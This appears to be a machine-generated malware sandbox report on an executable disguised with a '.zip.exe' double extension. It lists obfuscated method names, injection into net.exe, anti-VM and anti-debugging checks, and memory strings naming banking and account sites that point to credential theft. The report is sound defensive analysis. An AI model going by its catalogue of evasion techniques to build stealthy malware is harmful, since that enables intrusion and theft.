                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, lnvcOeVRwtKOkU4lWK5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YDShMMbwdH', 'qGKhnrw9j5', 'jTUh6kq4vm', 'wqJhgSKd2x', 'sa4hat0nMl', 'XcMhcWH6aW', 'HZHhDp7u6B'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, BhpI7xZJ8bG6DnnZfg.csHigh entropy of concatenated method names: 'DdIEiehfYv', 'YshEQmYQlS', 'XQ5EYGk4yT', 'zxQEkoNKe8', 'vaDELYt82D', 'zV4EGiRB5n', 'CJGE880MBB', 'ClWEUNAagc', 'TwaEFKoq4R', 'H6XEOhsXbA'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, kg1CTFWYTIlJYyVcQL.csHigh entropy of concatenated method names: 'dD7EVFSwvH', 'DCEE4OP7SF', 'sK2EPPxwW1', 'LdnPj9AcZE', 'uK8PzkoVjn', 'vLvEu3jxpX', 'kpWEvtJd1M', 'o0nEbwTT7V', 'jsnEJAZJiy', 'm5JEmp8HF4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, dJ60rUjheZ1KB4814D.csHigh entropy of concatenated method names: 'htx4kHZgSD', 'Lma4G1MOMo', 'rot4U9fPUc', 'IjT4FfcNgv', 'bWy4AC17p8', 'E8F4XKrL6N', 'rE64qyl1pj', 'qIa4dQmeWr', 'Po54pmnthO', 'dQ34hbCGqp'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, O8v7FsG65UW97xjpg0.csHigh entropy of concatenated method names: 'meCqes7rLd', 'IjHqtudB5N', 'ToString', 'vhqqV8ghXN', 'usCqsVUx2p', 'KLoq4Xy7SA', 'iaiqZLDhVE', 'heoqPiaebU', 'DEmqE5N9hO', 'BdRqBMWfnf'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, sfF1AvkoUaYuUINDnp.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Kk2bx9Fwew', 'CDtbj2T5mJ', 'sNybzHoDnr', 'un1Juw7LXJ', 'Bj3Jvi0EUR', 'XUFJbRWhXN', 'CTNJJeDfYH', 'HZRLvvXibY7JOXgyUAW'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, EOl4M4m0EwEs0A4E1N.csHigh entropy of concatenated method names: 'zpJpABQWE9', 'MTopqyBVtf', 'pExppQnRJW', 'DN6pfAXrxw', 'VpspHt8uvZ', 'kcZpTYFpxZ', 'Dispose', 'WxTdVZZXMm', 'VCvdskF0WY', 'qEsd4nVDvi'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, Q0QXQTVYbrCmLqw9blB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ngX9pb62EP', 'TJa9hbBLu8', 'amm9fObl6e', 'NsM99ASjQC', 'ovH9HGauvO', 'zlo92vBNqB', 'QhP9TePTeR'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, icu7vy73dA81VP8Gl9.csHigh entropy of concatenated method names: 'ToString', 'pS0XMlLdBn', 'PhoXSLnNwJ', 'GeVXlkARBh', 'WE3X7Yhd2Q', 'QIEXrAP1bX', 'JDEXoHBVnm', 'aMIX0kr2gu', 'OybXCyAxnt', 'Sb5XyqwfON'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, wTJkkY3RGXoYNOE4fQ.csHigh entropy of concatenated method names: 'R4dA3WkGpb', 'LbgAneaQqf', 'mDQAgyhHS1', 'Ko7Aa3K1AU', 'XwDASxrmmP', 'XbeAloIgVC', 'gSsA7qZmkd', 'vZxArJh4FU', 'LAkAoFryXw', 'uFXA02OkNS'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, SpYqQbJxQTpD4vNABf.csHigh entropy of concatenated method names: 'zmgIUrN839', 'xvgIF1X6E7', 'LQQIKPjRXE', 'E3sIS4qy5Y', 'IRbI7GVPCR', 'S2yIrXMUZm', 'JHOI08iGqs', 'dscICsNiGe', 'krII3TFoco', 'TYhIMVbPNQ'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, LQqdA6ckXYOJRum1Vw.csHigh entropy of concatenated method names: 's0uh4VpAjY', 'aNAhZ4WaRg', 'H5IhPClYbr', 'NR7hEs4Y09', 'qD7hp0Crbo', 'xN3hBw3KD9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.csHigh entropy of concatenated method names: 'RJZJRqibdG', 'TUtJVYUmKV', 'lJOJsrrxc7', 'GqwJ47YnLc', 'ngoJZQZb90', 'dGpJPUUN4l', 'vWlJE6YRfN', 'agCJBFB9fZ', 'lD8JNqbo3j', 'MVKJeSNA7J'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gbIZeiEITbeEjX9v2O.csHigh entropy of concatenated method names: 'LI9qWC8Xt9', 'l4TqjsdbcU', 'qcbdujwNhq', 'sNjdvmvnbO', 'WhJqMlG8lS', 'vKvqnO9FLS', 'VMXq6V1C2p', 'Vt0qglbuIX', 'nR6qaAS19B', 'BpXqcr0AK4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, dUgE0WFeMmwqcthSsi.csHigh entropy of concatenated method names: 'LxSpKunyLG', 'EmipS7cUvO', 'reZplytebB', 'qXYp7ViAN0', 'UseprlZm4u', 'yurpoNgc1T', 'Qf5p0O6eO8', 'VdBpCIbdwE', 'Ng9py077JA', 'usBp3Wdm8F'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, tmug9NaSrarT6mnnuH.csHigh entropy of concatenated method names: 'zSgsgr5CxO', 'vgxsaQkpBx', 'wdfscnXyNe', 'AM1sDqTPGQ', 'n1Aswu4GFZ', 'B4Hs191SOZ', 'k61s523d9o', 'Sb5sW190WD', 'A00sx4PZbt', 'ECjsjcKly6'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, JqFSsZtBBDaoutcR4d.csHigh entropy of concatenated method names: 'oZ7PR8dPKH', 'I9WPs072c9', 'zZOPZFrB9u', 'v0jPEKY0yW', 'TqmPBGFt1E', 'O4IZwPT9lJ', 'wiAZ1e6ElP', 'VkSZ53bfSr', 'uIMZWblZGM', 'p2lZxuMo9E'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, SX3KtaS81LM1DEh2Pi.csHigh entropy of concatenated method names: 'Dispose', 'h4qvx2jO34', 'YgKbSSN5br', 'Ytf9w6ldeY', 'zLhvjHnoRu', 'oXkvzdMoZj', 'ProcessDialogKey', 'kHHbuquu4I', 'BWQbvojmhF', 'tOCbbpln8P'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, r7grjtYOFfuOwO35vD.csHigh entropy of concatenated method names: 'yegvEDcIbV', 'mY1vB4Em1y', 'wFqve6gci2', 'HvHvtN7OPf', 'tgPvAt5rVw', 'ucUvXTa5Ac', 'YO9QHlQSbR6eE8TRX4', 'RcRojusiiIgKxGO1EY', 'rkG6mtO0O3qnY366Nd', 'FcivvErK7p'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, xHuCyUNVgijPJihWyi.csHigh entropy of concatenated method names: 'xoFPcx3ZiE', 'YnNPDLiG3t', 'RCwPwFVY2E', 'ToString', 'oOJP13MVsF', 'xxCP5E8Ja7', 'Csu4ZQLvS0AiyPBemsw', 'to9lJJLDhgsG1gb2D7Y', 'KQGA2dLeV8iU7nLthkZ', 'IILaK9LMZeF9SKxHe59'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, IawIjFBJhrAMATLEmD.csHigh entropy of concatenated method names: 'qUlY6BoWq', 'mEvkFZlVg', 'agDGWdPXj', 'g4p8TBGQR', 'oAjFxEl3r', 'GraOsrfU2', 'ktXcPMmSCL5VbVDKfo', 'MwK1ia9WFikwuWwM5O', 'X4GdxHS9K', 'BCghFmMWI'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, OKdsLYz9V6KEiBqfMy.csHigh entropy of concatenated method names: 'Gk4hGnxVAq', 'gHShUoVm3S', 'kJyhFrmBgq', 'yMfhKvpSZy', 'U38hSXlAYr', 'wQOh7JI9f7', 'fMXhrfR8mY', 'XjNhTod5al', 'YM4hij5SBB', 'Ah2hQg0UF7'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, NlGL1XOTFh72rhSpbZ.csHigh entropy of concatenated method names: 'oC5ZLZVitX', 'yh7Z87vsXT', 'koW4lLrdZI', 'FiN47NypZL', 'IQ84ryo9kM', 'aUm4o03Gxa', 'CnV40y9T09', 'VMU4Cpt1eK', 'NSf4yyXG6l', 'F2243qY39k'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, Nu12WkVVrJhpkFxrfpy.csHigh entropy of concatenated method names: 'TlihjTIt1C', 'nC2hz1bVdy', 'kuefuGTZC2', 'p8gfvdnLwh', 'CC7fb32jmT', 'voGfJZRUWx', 'aZafmCM4jk', 'DELfRIAZeZ', 'k9cfVH857e', 'zfSfsKyZYU'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, lnvcOeVRwtKOkU4lWK5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YDShMMbwdH', 'qGKhnrw9j5', 'jTUh6kq4vm', 'wqJhgSKd2x', 'sa4hat0nMl', 'XcMhcWH6aW', 'HZHhDp7u6B'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, BhpI7xZJ8bG6DnnZfg.csHigh entropy of concatenated method names: 'DdIEiehfYv', 'YshEQmYQlS', 'XQ5EYGk4yT', 'zxQEkoNKe8', 'vaDELYt82D', 'zV4EGiRB5n', 'CJGE880MBB', 'ClWEUNAagc', 'TwaEFKoq4R', 'H6XEOhsXbA'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, kg1CTFWYTIlJYyVcQL.csHigh entropy of concatenated method names: 'dD7EVFSwvH', 'DCEE4OP7SF', 'sK2EPPxwW1', 'LdnPj9AcZE', 'uK8PzkoVjn', 'vLvEu3jxpX', 'kpWEvtJd1M', 'o0nEbwTT7V', 'jsnEJAZJiy', 'm5JEmp8HF4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, dJ60rUjheZ1KB4814D.csHigh entropy of concatenated method names: 'htx4kHZgSD', 'Lma4G1MOMo', 'rot4U9fPUc', 'IjT4FfcNgv', 'bWy4AC17p8', 'E8F4XKrL6N', 'rE64qyl1pj', 'qIa4dQmeWr', 'Po54pmnthO', 'dQ34hbCGqp'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, O8v7FsG65UW97xjpg0.csHigh entropy of concatenated method names: 'meCqes7rLd', 'IjHqtudB5N', 'ToString', 'vhqqV8ghXN', 'usCqsVUx2p', 'KLoq4Xy7SA', 'iaiqZLDhVE', 'heoqPiaebU', 'DEmqE5N9hO', 'BdRqBMWfnf'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: zip.exeStatic PE information: Gd3lOevK672JYIK.zip.exe
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Gd3lOevK672JYIK.zip.exe PID: 3172, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: 76D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: 86D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: 8870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: 9870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: A2D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: B2D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: C2D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004155F0 rdtsc 4_2_004155F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 616Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 9357Jump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe TID: 2960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 1212Thread sleep count: 616 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 1212Thread sleep time: -1232000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 1212Thread sleep count: 9357 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 1212Thread sleep time: -18714000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668Thread sleep time: -51000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe TID: 5668Thread sleep time: -34000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0281C680 FindFirstFileW,FindNextFileW,FindClose,11_2_0281C680
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 35859UlfLq.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 35859UlfLq.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 35859UlfLq.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 35859UlfLq.11.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 35859UlfLq.11.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 35859UlfLq.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 35859UlfLq.11.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 35859UlfLq.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 35859UlfLq.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 35859UlfLq.11.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 35859UlfLq.11.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 35859UlfLq.11.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653096125.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 35859UlfLq.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 35859UlfLq.11.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 35859UlfLq.11.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 35859UlfLq.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 35859UlfLq.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 35859UlfLq.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 35859UlfLq.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 35859UlfLq.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 35859UlfLq.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 35859UlfLq.11.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 35859UlfLq.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 35859UlfLq.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 35859UlfLq.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 35859UlfLq.11.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 35859UlfLq.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 35859UlfLq.11.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 35859UlfLq.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 35859UlfLq.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 35859UlfLq.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: firefox.exe, 0000000D.00000002.2937725892.0000017D8445F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004155F0 rdtsc 4_2_004155F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_00417783 LdrLoadDll,4_2_00417783
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FC188 mov eax, dword ptr fs:[00000030h]4_2_018FC188
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FC188 mov eax, dword ptr fs:[00000030h]4_2_018FC188
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01880185 mov eax, dword ptr fs:[00000030h]4_2_01880185
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E4180 mov eax, dword ptr fs:[00000030h]4_2_018E4180
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E4180 mov eax, dword ptr fs:[00000030h]4_2_018E4180
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C019F mov eax, dword ptr fs:[00000030h]4_2_018C019F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C019F mov eax, dword ptr fs:[00000030h]4_2_018C019F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C019F mov eax, dword ptr fs:[00000030h]4_2_018C019F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C019F mov eax, dword ptr fs:[00000030h]4_2_018C019F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A197 mov eax, dword ptr fs:[00000030h]4_2_0183A197
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A197 mov eax, dword ptr fs:[00000030h]4_2_0183A197
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183A197 mov eax, dword ptr fs:[00000030h]4_2_0183A197
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019061C3 mov eax, dword ptr fs:[00000030h]4_2_019061C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019061C3 mov eax, dword ptr fs:[00000030h]4_2_019061C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE1D0 mov eax, dword ptr fs:[00000030h]4_2_018BE1D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE1D0 mov eax, dword ptr fs:[00000030h]4_2_018BE1D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE1D0 mov ecx, dword ptr fs:[00000030h]4_2_018BE1D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE1D0 mov eax, dword ptr fs:[00000030h]4_2_018BE1D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE1D0 mov eax, dword ptr fs:[00000030h]4_2_018BE1D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019161E5 mov eax, dword ptr fs:[00000030h]4_2_019161E5
